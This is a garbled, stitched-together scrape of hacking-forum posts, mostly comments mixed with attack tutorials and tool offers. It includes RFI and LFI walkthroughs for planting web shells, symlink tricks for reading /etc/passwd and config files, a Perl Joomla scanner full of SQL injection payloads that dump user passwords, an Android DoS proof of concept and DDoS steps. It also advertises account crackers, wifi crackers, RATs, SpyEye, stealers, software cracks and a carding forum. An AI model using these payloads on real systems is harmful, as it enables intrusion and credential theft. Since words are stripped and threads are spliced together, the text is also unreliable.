run tails and tor browser bundle with and without pix unfourtanly got the same results same issue. 
lavabit email was flawed. 
you want encrypted email use gpg answer yes aware that. 
but put for the ssl and mitm attack they were describing. 
something that not shure that could able stop specific case using tails tor browser bundle proxy vpn. 
saying this because this kind mass surveillance and internet monitor traffic been done lot countries around the world their whole citizens population. 
not isolated human cases look like project huge dimensions proportions with huge study huge budget and huge investment money behind. 
how can regular guy like from home going able stop such massive project against internet security privacy and anonymity. 
finally however think i'm confident that encrypted communications are not being read anyone else except the intended person persons answer seems that you like vpns have cisco vpn concentrator never tried configure because the tutorials found the internet are damn hard and havent been certified taking the classes yet that will show how configure. 
you think that one would the trick you are answer dont trust cisco. 
can you tell please posible create own openvpn linux server and client can connect own vpn that would encrypt all internet traffic. 
but need this from own home desktop ubuntu not involving two computers just one computer the one use everyday. 
found tutorial but the same story very hard and long process with long steps. 
possible this you know any links tutorials how this. 
friend request bomber too requests hour repost cant download. 
how long can this one. 
does this work white wrote paypal scam with this scam you can get victim logins victim personal information victim credit card victim bank details screentshot change your email this files login. 
tincode wrote bypass everything the server. 
can bypass permisson denied. 
luv learn such things. 
codefire wrote advanced dns hijacking its not made. 
net and does not exist and sends demand for. 
com and will ask for the address the. 
com knows the computer. 
watch out this method only for resolution request reverse dns. 
example has the same thing address. 
but don't mind here reply the form domain name type class ttl time live source data length source data domain name name the domain the following source reports domain name for this section are stored the same way question resolution request the flag will the domain name contains type type the question section query type more the same flag package. 
com phear heike opcode questions numbers htons answer numbers the number authorized the number additional the question part question name question type htons query type htons here the question. 
nstall hideman exit from hideman using system tray icon important turn off any virus guards run hideman crack and press crack button asked browse and select hideman. 
exe file from hideman installation path done image grin. 
png how fix disconnected issue sometimes you will continuously get disconnected message hideman after applying crack. 
follow the steps given below fix image grin. 
png run hideman press button under hours nothing will happen other than loading its payment menu click month option will open web page just close now close hideman completely using system tray icon hideman installation path and delete pref. 
cdat file example path program files hideman bin now open hideman and will work normally image grin. 
png this didnt work apply the crack step. 
crypto stealer have the option steal their btc wallet. 
waiting for the link. 
wrote yea you heard correct its leaked not believe take look the link enjoy mike let check. 
thank you going test this out. 
thanks bro for this. 
love try this man thanx for sharing. 
thnx dear testing now. 
thanks can you enlighten. 
waiting for your response. 
nice tutorial but this method old. 
know from year ago. 
now safe maybe more than. 
nice share brother i'll test this. 
thanks looks good brother. 
dont think mate checked the day you post this. 
figured its fake that time lol. 
how crack wifi password android. 
thanks searching for this. 
thx dude will check. 
interested seeing this thanks. 
what changes are made the connection panel. 
thanks for sharing let test can crack wifi password. 
thank you much really helps. 
ima try outima try outima try outima try outima try outima try outima try outima try outima try out. 
endgam wrote pootr wrote why don't need you. 
well this better than nothing. 
ldp wrote thx for share bro please download link. 
note i'm not spam here. 
thanks again cool tahnks for sharing the link also looking for rat configuration this tutorial incomplete think soo let know wrong. 
let see thanks for share. 
persia wrote wordprees uploader tool shot attach config attach enjoy cool tools. 
wsoso password for file tacoz sure smack that tacoz wrote hey guys finally releasing own hack pack there lots stuff this big pack enjoy download. 
wsoso password for file tacoz sure smack that thank you very much for sharing with. 
would like see content. 
thanx man that's what need bro. 
thanx lot for this hack pack. 
nice work guy nice thread. 
having problems when start say run this program you need. 
net framework after download the framework still not even opening and giving error please help. 
requirements for crack wifi password android rooted android mobile nearby wifi with wps abailable features this wifi cracker apk left cracking any wep wpa and wpa wifi wps available left faster method took only seconds left much more. 
thanks mate god bless you. 
this thread for beginners. 
good see abt microsoft. 
any one can veryfie dont have icq only skype atention always post your contact. 
information your crack with sentry mba then this tool must have contains everything you'll need start cracking. 
download the fix bypass registration features sentry mba. 
tools get proxies and combos. 
extract your history with ease. 
helps you resolve any sentry mba issue. 
radio support make cracking more enjoyable. 
works any windows computer bit. 
sentry mba aio toolkit. 
bots fixes proxies combos sqli. 
com file cbcd fbe analysis. 
thank you for sharing the knowledge. 
nevertheless you can't give people like idiot yet lol it's detectable avs you need crypter you kind find lots here this forum try customize change icon bind make something clever yet simple it's the end have fun now and took hour and half make this will take you sec say thanks don't shy there okay thnks codefire wrote guys this tut rat don't rough summary code downloading config port forwarding set the end lets begin downloading you will need all these download them duh direct download and that's pretty much. 
video facebook video embed code for this video. 
insertbefore fjs document 'script' 'facebook jssdk' hacking facebook pagesanother serious vulnerability hacking facebook pagesstatus fixedreward usdproof concept posted xter wednesday august page takeover request post. 
size small font arial sans serif don't worry you can still modify the permissions you have granted other apps. 
thanks men you the best ever. 
great tutorial jai hind jai mata jai bhole bhagwana jai jai jai jai nice tutorial bro amazing art damn nice hack. 
com code ftp address netez. 
com username xplorer netez. 
com password default port pasv. 
thanks for sharing good tricks keep. 
tanx bro thanx for sharing. 
thank you lay wrote this tool really work but need wordlist for cracking. 
totally taking look this. 
tnq will download this. 
how open blocked site collage note assume here that all are cmd and knows how change binary into decimal and vice versa. 
ping the blocked site and you will get the address. 
change the address into binary. 
com you will get. 
after converting into binary using windows calci. 
you will get like this. 
remove points the result and change the result into decimal again. 
you will get this. 
add the hypertext protocol prefix and paste into your browser address bar and press. 
great man very good. 
link broke please upload. 
thanks for sharing this code. 
thank you this will for sure come handy. 
thanks much hope get run. 
nice share man thanks. 
you know new link toxicola qwv. 
onion dead tried june. 
this great post for beginners. 
spy eye new http botnet spyeye was written this moment exe has size. 
ospy eye new http botnet spyeye was written this moment exe has size. 
wrote hey neo nicce post yeer please post part soon waiting for testing and need help need subdomain for testing possible give private kiddle. 
indianhacker domain might changed someone eles wrote hey neo nicce post yeer please post part soon waiting for testing and need help need subdomain for testing possible give private kiddle. 
this simple guide read somebody else facebook messages without any effort cheers mike this post almost gave stroke agree. 
directory hide virus scan here download link here hide credits chumlee. 
hope its virus free lol. 
spyeye and next gmbot. 
hey guys have ios and have been searching for some kind app wanting make app where you can open exe iphone and use the program anyone down try sent from iphone using tapatalk. 
would like get the full exploit for all versions. 
thank you thank you. 
thanks for the offer. 
thx for share man. 
dictionthank you appreciatedary attack. 
codefireok wrote for password cracking you can choose two different methods. 
cracker wrote always welcome. 
brute vindeta there perebrat error proxy http socks imap. 
will check them out. 
hacker wrote thanks share bro please send link. 
code exploit title android kernel. 
local dos date author twitter net versions android. 
category dos android vulnerability the android vulnerable local dos when filename with length larger attempted written the sdcard vfat multiple times. 
the result successful running the exploit code the system restarting. 
the vulnerability only effects android kernels that are the version. 
vendor timeline the android security team has been contacted with updated poc code and details. 
they have been aware this vulnerability for over year. 
tombstone build fingerprint 'verizon sch sch. 
gingerbread user release keys' pid tid name sensorservice system server signal sigfpe code fault addr cpsr eae bea edab fede scr backtrace dcf system lib libc. 
kill system lib libc. 
aeabi idiv system lib libc. 
aeabi idiv poc include. 
int main int argc char argv char buf int file path sdcard typically sdcard strcpy buf sdcard for strcat buf for fopen buf return. 
tread owner please there builder. 
india wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
com groups nice one keep. 
thanks very much fam. 
let see how works. 
how can close this program. 
please can some one contact mail address mustu hotmail. 
need some help regarding the website hacking. 
wrote what rfi remote file inclusion remote file inclusion rfi type vulnerability most often found websites. 
com suppose our target site. 
for checking our url will become something like diz. 
com after executing the command the homepage the google shows then then the website vulnerable this attack does not come then the site not vulnerable rfi. 
txt now comes adding our shell victims website okay once are the vulnerable page. 
com will have replace. 
com and include our own file place its. 
txt our new link should look like this. 
txt note the question mark important. 
uploaded our shell successfully the target site and think you all know that what all you can after uploading shell the site smile. 
but which sites makes top the moment. 
i've never looked into this before i'd like see tutorial hacking website. 
very informative thanks for sharing. 
thanks have been looking for this for long. 
com groups img img. 
requirements for crack wifi password android wifi wep crack apk rooted android mobile nearby wifi with wps abailable features this wifi cracker apk left cracking any wep wpa and wpa wifi wps available left faster method took only seconds left much more. 
steps for crack wifi password android how crack wifi password mobile first download wifi cracker app name wifi wps wpa tester after download open app give root permissions click grant after that click refresh icon from top right will show you list all available wifi available your area wifi has wps available vulnable then will cracked click wifi name click try connect then will take seconds maximum boom will show you wifi password now wifi has wps available and vulnable wifi not vulnable then will give you error you got this error then your bad luck. 
vey much will try this for real. 
uegwu euw euw guwgeu geuu euw geu geuweu guw ugewue wgo. 
pratham wrote patch not working got error. 
its working absolutely fine with might issue just reinstall the system files. 
good job brother thx for share. 
xcoding team wrote hello community have you ever wanted hack someone's mail account you need find person's sensitive information you want invade person's paypal skrill amazon apple facebook any other site account we're here present gmail password cracker the name says gmail password cracker simple software developed for cracking gmail password accounts. 
jkou uopk jgnj iij. 
for sharing this with. 
will check this works thanks. 
thanks mate hope works was looking for programs likes this thanks mate your the best and thanks for shareing this hope works cheers mate. 
trying access private gallery fabswingers. 
com website you have friends with the person view there gallery there way around this. 
will pay also the website really secure would great maybe get admin privileges database from the site really looking for someone who can help can hook skype usename jwood outlook. 
com add and can talk. 
thanks for share bro good. 
hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links ''i've reached the image limit have write here. 
biz you put hidden content you must reply see links host only that number. 
create your server and run and hopefully should work code skip keylogger hosts file add plugins file binder choose icon just trying show how basic portforward would look like hidden content you must reply see links enjoy. 
thank you this tool good bro. 
thanks hope this one link isnt borken. 
link broken please upload. 
dsa dasdsadas dsa das. 
good software prank friends. 
this the latest version spyeye. 
wanna see how works. 
ill have look where can see. 
but how many email can send once. 
thanks this great tool. 
will test out today. 
let try this thank you for sharing account suspended refresh please. 
thanks for sharing want see works. 
elite wrote thanks for the thread doubt whether works. 
type this console set url example set url url. 
this botnet uses batch vbs and you must have ftp server. 
its simple peace vbs code with ftp control center automated batch. 
the batch part automates the set progress you don't have worry about miss configuration also has the command session witch will tell the bot connect your meterpreter session that you can upgrade. 
you are interested this free open source bot privet msg. 
and you would like help the development also msg. 
dork for this exploit code register. 
thanks for sharing dude. 
you all too late. 
sites owners removed that files got any problem and check with. 
hack forums you are either not logged not have permission view this page. 
this could because one the following reasons you are not logged registered. 
please use the form the bottom this page login. 
you not have permission access this page. 
are you trying access administrative pages resource that you shouldn't check the forum rules that you are allowed perform this action. 
your account may have been disabled administrator may awaiting account activation. 
you have accessed this page directly rather than using appropriate forms links. 
pretty sure spyeye outdated. 
web injection and form grabbing outdated. 
anybody tried this yet. 
does this really work. 
good job thank lot. 
cracking tifi password from android phone now everyone dream. 
steps for crack wifi password android how crack wifi password mobile first download wifi cracker app name after download open app give root permissions click grant after that click refresh icon from top right will show you list all available wifi available your area wifi has wps available vulnable then will cracked click wifi name click try connect then will take seconds maximum boom will show you wifi password now wifi has wps available and vulnable wifi not vulnable then will give you error you got this error then your bad luck thanks. 
but will still download everything and try running vmware. 
this trick still working dont beleieve look the below trick posted. 
serial key description anti monitoring software utility that effectively and practically that helps you protect your system against spy programs custom compiled known and unknown. 
our software offers top notch real time protection against the zero day and monitoring spy software known and unknown such keyloggers loggers webcam and even sophisticated financial malware. 
features anti keylogger system protection anti clipboard logger anti screen logger anti voice logger world first keystroke encryption browser security anti webcam logger how activate download and install software restart important run click enter key enter the registration details given click activate that all enjoy seriously hit that button that's motivating factor hide hide note always perform virus scan and download your own risk. 
thanks for the thread doubt whether works. 
mikew wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
very good tool for wifi hacking. 
thank you very much bodi. 
thank your much even its not working anymore. 
akki wrote hey bro also crack this tool name akki key cpxmc imdfu ywppj qafrb great. 
thanks will take look. 
hey bro also crack this tool name akki key cpxmc imdfu ywppj qafrb. 
thanks much for the sexy asf post share that. 
awesome this will come handy. 
cheers will check out now. 
good will try this. 
looks good will give try. 
com the best visit. 
thanks very much guy. 
thanks wanna see page boss. 
size day config attach color ddos color ddos ping. 
let try sent from iphone using tapatalk. 
nice post check working not nice post check working not. 
its quite good enough but cant download. 
this simple guide read somebody else facebook messages without any effort cheers mike how. 
for those you who have seen saurfangs's anti forensics thread click here have created script automate the whole process. 
the only thing doesn't encrypt your drive with trucrypt but i'm sure you can figure that one out instructions are the. 
password click here download. 
edit take backup your registry before doing this. 
also wouldn't this your main. 
virtual machine for testing purposes only. 
disclaimer included the files. 
replying see the hidden texts. 
sounds simple lets see. 
com jshaw cheatsheets thanks adm jus replying see. 
thanx share good advice run sanboxies. 
please can you send link. 
thanks for sharing everyttime new tricks. 
can you send this pls. 
hello everyone launched new carding and hacking forum. 
which free join and you can get free credit cards paypal smtp rdp webmail mailer porn account dumps hacking and carding tutorials and are also doing western union money tranfer and electronics shipment and much more you cant even imagine join now for free and enjoy all free stuffs. 
thank you thats great for someone new the industry. 
want see what hidden. 
that sounds amazing but what you need account has been suspended pls the details you would kind. 
did you find this method. 
jesus with you son. 
thank you for this share. 
lol this shit going funny asl. 
thanks you for this. 
for checking our url will become something like diz url after executing the command the homepage the google shows then then the website vulnerable this attack does not come then the site not vulnerable rfi. 
url now comes adding our shell victims website okay once are the vulnerable page url will have replace and include our own file place its our new link should look like this. 
uploaded our shell successfully the target site and think you all know that what all you can after uploading shell the site smile thx for the share. 
show conent want try this trick and let you know working not. 
cant wait play with this. 
thank you for windows linux. 
really will test ththis. 
wow looks amazing lol. 
luckmangamer wrote okay lets see thanks pro very much. 
man really needed this thank you much. 
aurora wrote personally don't ddos but you're looking attack home connections save your money and buy web based stresser you're looking attack sites would suggest buying servers and either coding own scripts use public ones however both would work. 
thx for the tip yea know i'm beginner but i'm lost and dont know where start. 
thanks you very much bro. 
replying see the hidden. 
codefire wrote this tut has been submitted sen haxor now days most the linux kernel server show this error when you try symlink the server. 
this can bypassed reading ect passwd and symlink. 
can used bypass this. 
will posting the download link some shells will using this tutorial best script which can bypass cant read ect named. 
config fucker web root hack tools. 
mass symlink config files. 
config killer team indishell. 
mass symlink config file php based script. 
perl script mass symlink config files. 
usage config fucker con fig killer and symlink pain perl script just upload them the server make sure that you create new directory. 
upload the scirpt and use the command cat ect passwd read all ect passwd from the server and copy them and just open your script and paste there and click get config and your done. 
just open the link the folder you created. 
you need open site. 
com sen and all config files will there note its better create php. 
ini file before you this for result all shells have mentioned will post the download link and will using another private shell for this which wont giving you all for priv issue its mannu shell coded team indishell which can bypass cant read ect named. 
but forbidden server cant bypassed using this shell. 
now cant symlink the public html the website can use symlink. 
script symlink bypass option now that can easily symlink public html path each website now some server show forbidden error when you try symlink them now lets see how pass this shit for forbidden error will using the following shells. 
dhanush shell coded arjun. 
this shell automitically creates. 
php files after you login. 
mannu shell team indishell private. 
script will posting the download link dhanush shell and symlink. 
mannu shell private already told what the trick that makes bypass forbidden its just the. 
ini which contains the following code. 
open dhanush shell which automatically creates. 
mannu shell check bypassed error. 
bypassed forbidden and access public html path bypassed can't read ect named. 
conf and forbidden error here download link all shell and script used greetz cyberace legion who made make this tut and team indishell and all indian hackers. 
thanks regards sen haxor nice. 
thanks for the good post. 
good tutorial bro but can't understand. 
can someone explain how this work. 
reply see hidden content idiotic one. 
has only read txt file. 
very useful thanks for posting. 
lets see how this work. 
method note you will need firefox and its addon tamper data this method lfi local file inclusion allows you include local file which means that the file stored the server and run webscript. 
this method are going upload shell accessing the proc self environ. 
now have our page. 
php and now are going this. 
gives you error message this good. 
best thing that can happen says such file directory. 
but anyways now add this your url. 
etc passwd and long there text other than error message the page keep adding. 
the url would like. 
now let's say got this url. 
passwd and see some huge shitty text can not handle with. 
now change the etc passwd the url proc self environ would look like this. 
environ you see some text you did good you see error message you did bad. 
now this the point where use tamper data. 
start you tamper and reload the page and for user agent you type the following php script code. 
txt while feof stream shell. 
fgets stream fwrite file shell fclose file this will execute the php script the site and create shell. 
why because the user agent being displayed the webpage and you put webscript for that will execute. 
now simply access your shell going. 
php and rape the server. 
now lfi method note this only works apache servers alright you get back the point where tried access the etc passwd. 
you will the same method but not with etc passwd you will try get access apache logs error. 
log you have brain you should know how that since it's exactly the same method etc passwd explained lfi method. 
now when you have found the file open cmd and type telnet. 
com when you are inside the telnet you copy the following code you use your own shell url ofc code. 
fgets stream fwrite file shell fclose file paste into the telnet window and press enter once maybe twice until you get error message. 
now refresh the page the browser error. 
log once and there you. 
the php script will executed and your shell will get uploaded the server. 
access typing the following into your browser. 
php author ahfcrew blog video tut for the tamper data method video youtube yrdqd. 
com watch feature player embedded yrdqd video agent's script used the video code. 
bros thank you lots. 
thanks for the upload man. 
want see the the hidden content. 
this tool possible hack specified account. 
please update your download link bro. 
php content try googling and find sites when find site for example. 
php replace with etc passwd. 
i'm gonna test hope still works though. 
thanks this what been waiting for. 
omg real omg real. 
persia wrote wordprees uploader tool shot attach config attach enjoy. 
can't wait try this out thanks for the share mate. 
cool one needed though. 
idm optimizer maximizes downloading speed idm. 
antiviruses scan result link. 
very good thhanx share. 
awesome bro url reflesh please. 
org mail luit usa. 
commands sql injection and select from select count concat select select concat cast concat username password sal char from user where userid limit floor rand from information schema. 
peace out nigga found luit site. 
cool ill using this. 
can help you you whant. 
thanks about trying out. 
hey hey don't spam everywhere. 
you want cpanel for hosting you want hacked cpanel for what purpose you want. 
yeah understand the hacks. 
select yourquery into outfile. 
txt command execution you're mysql. 
let's see how this thanks advance does work. 
thanks lot let try now. 
thank you but its give error while generate server win. 
hello friends are the xcoding team before start let ask you some questions have you ever lost your own wifi network password have you already faced situation where you needed wifi connection but didn't have the network password have you ever wanted know the password protected wifi network i'm pretty sure you answered yes least one these questions didn't you well this now over proudly present you the wifi hack clean and lightweight can find and decrypt wep wpa and wpa passwords proxy settings option very easy use. 
anyone can are selling the full version wifi hack for. 
bitcoins via satoshibox you can also try wifi hack for free with limit password decryptions. 
html give full support for all our customers via skype. 
just send your transaction and we'll glad help you have any doubt just add skype xcodingteam ask here. 
application name likno web button maker application version. 
com protection type custom packer protector non release type patch download patch from here code. 
must look this this look awesome. 
png vbs ftp meterpreter new vbs botnet. 
png its simple peace vbs code with ftp control center automated batch. 
gingerbread older you should use method because pptp broken. 
read more step the wireless and network settings. 
normally recommended enable encryption but because the bug pptp android software you need disable encryption. 
thanks lot mate let try out. 
you should try gatherproxy. 
its free tool and you can grabber from any source such hma. 
personal its better than proxy goblin. 
let see how our works thansk link expired can anyone give the link. 
usr bin perl coded greetz life ilyrianwarrior wulns aler cru. 
hack down name joomla vulnerability scanner email mem live. 
com sacred legion pirate. 
print sacred legion name joomla vulnerability scanner coded mail mem live dot com site. 
greetz life wulns aler cru. 
hack down joomla vulnerability scanner sqli scanner remote exploits use use lwp useragent xpl com union all select concat username password from jos users com storedirectory union select concat username email password from jos users com annuaire union all select concat username password from jos users com maianmedia union all select group concat username char password from jos users com alfurqan union all select concat username password kamtiez from jos users com markt union select password username from jos users com sponsorwall and union select concat username password rix from jos users com flipwall union select concat username password rix from jos users jedirectory union select concat from jos users where userid com ezautos and union select concat username password from users where gid gid and block com arash and union select concat username password from jos users com taxes union all select group concat username password email usertype from jos users com vat union all select group concat username password from jos users com blogs and union select version database concat username password from jos users com union select concat username password from jos users com simpleshop union select concat username password usertype lastvisitdate from jos users com youtube union select concat username email from jos users com joomdle. 
union all select group concat username password from mdl user and 'kamtiez' 'kamtiez com itaromry filter search filter level filter race filter class and union all select concat username password from jos users com iproperty union all select group concat username char password from jos users com huruhelpdesk union select concat username password from jos users com jomtube union select group concat username password from jos users option com jomtube com spa union select concat username password from jos users com staticxt union select concat username password from jos users com ybggal and union all select group concat username char password from jos users com quran union select group concat username password email activation from jos users com konsultasi union select all concat username password from jos users com newsfeeds union select concat username char password from jos users wapmain union select concat username password from jos users limit com abc union select group concat username password from jos users com joomradio union select group concat username password from jos users com jtm union all select concat username password from jos users task search com gbufacebook union all select concat username password from jos users and 'kamtiez' 'kamtiez com manager union all select group concat username char password from jos users com jobs union all select group concat username char password from jos users com sermonspeaker union select concat username password from jos users com jdrugstopic union select concat username password from jos users com and union select group concat username password from jos users com articles union select concat username password from jos users com dcs flashgames union all select user version concat username password from jos users com bidding union all select concat username password from jos users com acteammember union select concat username password from mos users itemid com acstartseite and union select concat username password from mos users com productbook union all select concat username password email from condev. 
jos users com yelp union all select concat username password concat username password from jos users com dms union all select concat username password from jos users com union all select concat username password from jos users com casino union all select username password from jos users com doqment union select concat username password from jos users com alfresco union select concat username password rixf from jos users com countries union select concat username password from jos users print nweb page. 
com chomp target lwp useragent new die could not initialize browser agent 'mozilla. 
php option com view alleventlist more event. 
res request answer res content answer print results check print joomla ajax event component com sql injection vulnerability else print error host target. 
php option com storedirectory task view. 
res request answer res content answer print results check print joomla component com storedirectory sql injection vulnerability else print error host target. 
php option com annuaire view annuaire type cat. 
res request answer res content answer print results check print joomla com annuaire sql injection vulnerability else print error host target. 
php option com maianmedia view music cat. 
res request answer res content answer print results check print joomla component com maianmedia sql injection vulnerability else print error host target. 
php option com alfurqan action viewayat surano. 
res request answer res content answer print results check print joomla component com alfurqan sql injection vulnerability else print error host target. 
php option com markt page show category catid. 
res request answer res content answer print results check print joomla component com markt sql injection vulnerability else print error host target. 
php option com sponsorwall controller sponsorwall catid. 
res request answer res content answer print results check print joomla component com sponsorwall sql injection vulnerability else print error host target. 
php option com flipwall controller flipwall catid. 
res request answer res content answer print results check print joomla component com flipwall sql injection vulnerability else print error host target. 
php option com jedirectory view item catid. 
res request answer res content answer print results check print joomla directory sql injection vulnerability else print error host target. 
php option com ezautos itemid task helpers firstcode. 
res request answer res content answer print results check print joomla component com ezautos sql injection vulnerability else print error host target. 
php option com arash. 
res request answer res content answer print results check print joomla component com arash sql injection vulnerability else print error host target. 
php option com taxes. 
res request answer res content answer print results check print joomla component com taxes sql injection vulnerability else print error host target. 
php option com vat. 
res request answer res content answer print results check print joomla component com vat sql injection vulnerability else print error host target. 
php option com blogs task details. 
res request answer res content answer print results check print joomla component com blogs sql injection vulnerability else print error host target. 
res request answer res content answer print results check print joomla component com sql injection vulnerability else print error host target. 
php option com simpleshop itemid task viewprod. 
res request answer res content answer print results check print joomla component com simpleshop sql injection vulnerability else print error host target. 
php option com youtube cate. 
res request answer res content answer print results check print joomla component com youtube sql injection vulnerability else print error host target. 
php option com joomdle view detail cat course. 
res request answer res content answer print results check print joomla component com joomdle sql injection vulnerability else print error host target. 
php option com itarmory view guildmembers itemid. 
res request answer res content answer print results check print joomla component com itarmory sql injection vulnerability else print error host target. 
php option com iproperty view. 
res request answer res content answer print results check print joomla component com iproperty sql injection vulnerability else print error host target. 
php option com huruhelpdesk view detail cid. 
res request answer res content answer print results check print joomla component com huruhelpdesk sql injection vulnerability else print error host target. 
php view videos type member user. 
res request answer res content answer print results check print joomla component com jomtube sql injection vulnerability else print error host target. 
php option com spa view spa read more pid. 
res request answer res content answer print results check print joomla component com spa sql injection vulnerability else print error host target. 
php option com staticxt staticfile test. 
res request answer res content answer print results check print joomla component com staticxt sql injection vulnerability else print error host target. 
php option com ybggal itemid catid. 
res request answer res content answer print results check print joomla component com ybggal sql injection vulnerability else print error host target. 
php option com quran action viewayat surano. 
res request answer res content answer print results check print joomla component com quran sql injection vulnerability else print error host target. 
php option com konsultasi act detail sid. 
res request answer res content answer print results check print joomla component com konsultasi sql injection vulnerability else print error host target. 
php option com newsfeeds view categories feedid. 
res request answer res content answer print results check print joomla component com newsfeeds sql injection vulnerability else print error host target. 
php option onews action link. 
res request answer res content answer print results check print joomla component wapmain. 
php sql injection vulnerability else print error host target. 
php option com abc view abc letter sectionid. 
res request answer res content answer print results check print joomla component com abc sql injection vulnerability else print error host target. 
php option com joomradio page show video. 
res request answer res content answer print results check print joomla component com joomradio sql injection vulnerability else print error host target. 
php option com jtm view search view search author. 
res request answer res content answer print results check print joomla component jtm reseller sql injection vulnerability else print error host target. 
php option com gbufacebook task show face face. 
res request answer res content answer print results check print joomla component com gbufacebook sql injection vulnerability else print error host target. 
php option com manager view flight itemid. 
res request answer res content answer print results check print joomla component com manager sql injection vulnerability else print error host target. 
php option com jobs view detail. 
res request answer res content answer print results check print joomla component com jobs sql injection vulnerability else print error host target. 
php option com sermonspeaker task latest sermons. 
res request answer res content answer print results check print joomla component com sermonspeaker sql injection vulnerability else print error host target. 
php option com jdrugstopics view drugsdetails. 
res request answer res content answer print results check print joomla component com jdrugstopics sql injection vulnerability else print error host target. 
php option com task menu display venue mid. 
php option com articles task view addarticles sid. 
res request answer res content answer print results check print joomla component com articles sql injection vulnerability else print error host target. 
php option com dcs flashgames itemid catid. 
res request answer res content answer print results check print joomla component com dcs flashgames sql injection vulnerability else print error host target. 
php option com bidding. 
res request answer res content answer print results check print joomla component com bidding sql injection vulnerability else print error host target. 
php option com acteammember. 
res request answer res content answer print results check print joomla component com acteammember sql injection vulnerability else print error host target. 
php option com acstartseite itemid. 
res request answer res content answer print results check print joomla component com acstartseite sql injection vulnerability else print error host target. 
php option com productbook itemid func detail. 
res request answer res content answer print results check print joomla component com productbook sql injection vulnerability else print error host target. 
php option com yelp controller showdetail task showdetail cid. 
res request answer res content answer print results check print joomla component com yelps sql injection vulnerability else print error host target. 
php option com dms task view category category. 
res request answer res content answer print results check print joomla component com dms sql injection vulnerability else print error host target. 
php option com task edit cid. 
res request answer res content answer print results check print joomla component com sql injection vulnerability else print error lwp useragent new die could not initialize browser agent 'mozilla. 
php option com casino task category. 
res request answer res content answer print results check print joomla component com casino sql injection vulnerability else print error host target. 
php option com doqment cid. 
res request answer res content answer print results check print joomla component com doqment sql injection vulnerability else print error host target. 
php option com alfresco task edit pan. 
res request answer res content answer print results check print joomla component com alfresco sql injection vulnerability else print error host target. 
php option com countries locat. 
res request answer res content answer print results check print joomla component com countries sql injection vulnerability else print error print sacred legion. 
here will show you app names which can crack wifi from rooted android device. 
color thanks for sharing this with community hope work edit adlfy link dont work anymore pls reup otherwise close thread pls color. 
good find bro thank you. 
thank you thank you thank you thank you thank you penetration testing security cheatsheets that have collated over the years. 
would help out lot. 
ravenous wrote let's see what's leaked. 
also want learn cpanel cracking. 
thanks for sharing bro keep. 
cool wanna try this. 
lemme check and ill edit soon. 
tjh tqjrtjuqj gsd fgf sdhs dahf huqe. 
nice but the file isnt the dropbox gives error. 
thatz why belong here. 
good thanks for sharing. 
thanks for sharing apperictae. 
update hide reply url hide reply whats new you can now enable the feature auto start the stealer when the phone boots you can now enable the feature delete the zip file after uploading sms thread fixed and optimized sms stealer now includes date and fixed your trying dump tutorial wanna give you. 
checking this out thanks man. 
indian also want learn followed few achievement also forum like mit hacking dude will glad learn from forum looks good but its not clean its little complicated and messed making little simpler and would definately attract more visitor. 
thanks for the tip. 
great post bro thanks alot. 
waw interesting read thank you very much. 
size day will discuss advanced attack deface site. 
this attack used stop functioning site that one can access. 
attach config attach color distributed denial service attack ddos attack attempt make computer resource unavailable its intended users. 
one common method attack involves sending enormous amount request server site and server will unable handle the requests and site will offline for some days months depending upon the strength attack. 
data sent the site server color basic procedure logic employed ddos. 
open command prompt windows going start all programs accessories command prompt. 
here site the address target you can also use site name like. 
the size packet sent the target which example. 
the requests sent the target. 
the waiting time after each request which sec example. 
you can change these parameters according your need but don't omit these. 
this attack also called ping death but actual single computer using this attack cannot deface site for long time. 
hackers create and install botnets different computers trojans and use those comprised computers also send these dummy packets target. 
when large compromised computer send simultaneous requests the target the target site will offline and defaced. 
this for education only now would like know more about botnets just goto the link learn more about botnets. 
codefirethanks wrote hello friends long time after came here and thinking write something useful for you guys. 
tonight will post tuts botnet. 
cyber warrior wrote features fully undetected batch code easy setup works with windows vista runs silently the background copies files fast servers trace left process shown makes beep sound once when finished steals text messages iphone backup system info processes running favorites documents pictures videos. 
this can lead something minimal outputting the contents the file but depending the severity list few can lead thanks code execution the web server code execution the client side such javascript which can lead other attacks such cross site scripting xss. 
uploaded our shell successfully the target site and think you all know that what all you can after uploading shell the site smile mustu hotm ail. 
com wrote please can some one contact mail address mustu hotmail. 
wrote what rfi remote file inclusion thank you for this post remote file inclusion rfi type vulnerability most often found websites. 
because this router off. 
thanks waiting see that. 
been looking for this for ages thanks. 
thank you for sharing awesome. 
cheers mike lets see and give try. 
thanks man helped lot. 
thank you thank you thank you thank you thank you. 
foscam cameras improper access restrictions. 
advisory information title foscam cameras improper access restrictions advisory core advisory url. 
strictions date published date last update vendors contacted foscam release mode user release. 
vulnerability information class information exposure cwe impact security bypass remotely exploitable yes locally exploitable cve name cve. 
vulnerability description due improper access restriction the foscam device allows remote attacker browse and access arbitrary files from the following directories tmpfs and log without requiring authentication. 
this could allow remote attacker obtain valuable information such access credentials configuration and other sensitive information plain text. 
the list affected files includes but not limited the following. 
other foscam devices based the same firmware are probably affected too but they were not checked. 
non vulnerable packages vendor did not provide details. 
contact foscam for further information. 
vendor information solutions and workarounds there was official answer from foscam after several attempts see sec. 
contact vendor for further information. 
some mitigation actions may not expose the camera internet unless absolutely necessary and have least one proxy filtering http requests the following resources. 
credits this vulnerability was discovered flavio cristofaro and researched with the help andres blanco from core security technologies. 
the publication this advisory was coordinated fernando miranda from core advisories team. 
technical description proof concept code. 
accessing manufacturer ddns configuration requesting the following url using your default web browser. 
conf you will see something like this logininfo hostname ddns. 
port username password domain domain. 
access credentials stored backup files when configuration backup required operator administrator the backup generated the local folder 'tmpfs' named 'config backup. 
the binary file just dump the whole configuration packed gzip and can accessed accessing the following url. 
bin the presence this temporary file enables attacker download the configuration files which contain usernames plaintext passwords including admin passwords wifi configuration including plain psk among other interesting stuff shown below username admin password admin authtype authgroup user username user password user authtype authgroup user username guest password guest authtype authgroup important mention that order access the configuration file previously mentioned operator and administrator should have executed the backup process advance. 
core security technologies notifies the foscam team the vulnerability. 
vendor acknowledges the receipt the email and asks for technical details. 
draft report with technical details and poc sent vendor. 
publication date set for jul. 
core asks the are confirmed. 
foscam product team notifies that they have checked core's website but there foscam info. 
core notifies that the advisory has not been published yet and sends technical details and proof concept. 
core asks for reply. 
first release date missed. 
core notifies that the issues were reported month ago and there was reply since. 
core releases the advisory core tagged user release. 
uyiano wrote want know about this lets have look this. 
rulz mass defacer and log eraser coded pri priv priv priv priv usage perl msrml. 
